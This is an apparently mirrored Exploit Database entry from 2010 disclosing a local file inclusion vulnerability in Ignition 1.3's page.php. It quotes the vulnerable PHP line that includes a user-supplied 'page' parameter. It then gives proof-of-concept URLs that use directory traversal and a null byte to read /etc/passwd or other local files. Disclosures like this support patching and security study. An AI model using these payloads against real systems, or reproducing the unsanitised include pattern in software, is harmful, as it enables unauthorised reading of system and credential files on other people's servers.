Ignition 1.3 – ‘page.php’ Local File Inclusion

• Exploit Database
• 111 阅读

• 作者： cOndemned
  日期： 2010-12-30
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15864/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29

  Ignition 1.3 (page) Local File Inclusion Vulnerability disclosed by cOndemned   download:   http://launchpad.net/ignition/trunk/1.3/+download/ignition-1.3.tar.gz   note: 1. Magic_quotes_gpc should be turned off in order to exploit this vulnerability 2. LFI bugs found by me in previous version (1.2) are still working in this one     source of page.php   1. <?php 2. session_start(); 3. require "data/settings.php"; 4. if (file_exists(&apos;data/pages/&apos;.$_GET[&apos;page&apos;].&apos;.html&apos;)) { 5. include (&apos;data/pages/&apos;.$_GET[&apos;page&apos;].&apos;.html&apos;); <----- LFI 6. }else{ 7. die( 8. require(&apos;404.php&apos;)); }     proof of concept:   http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../etc/passwd%00 http://[attacked_box]/[ignition1.3]/page.php?page=../../../../../[localfile]%00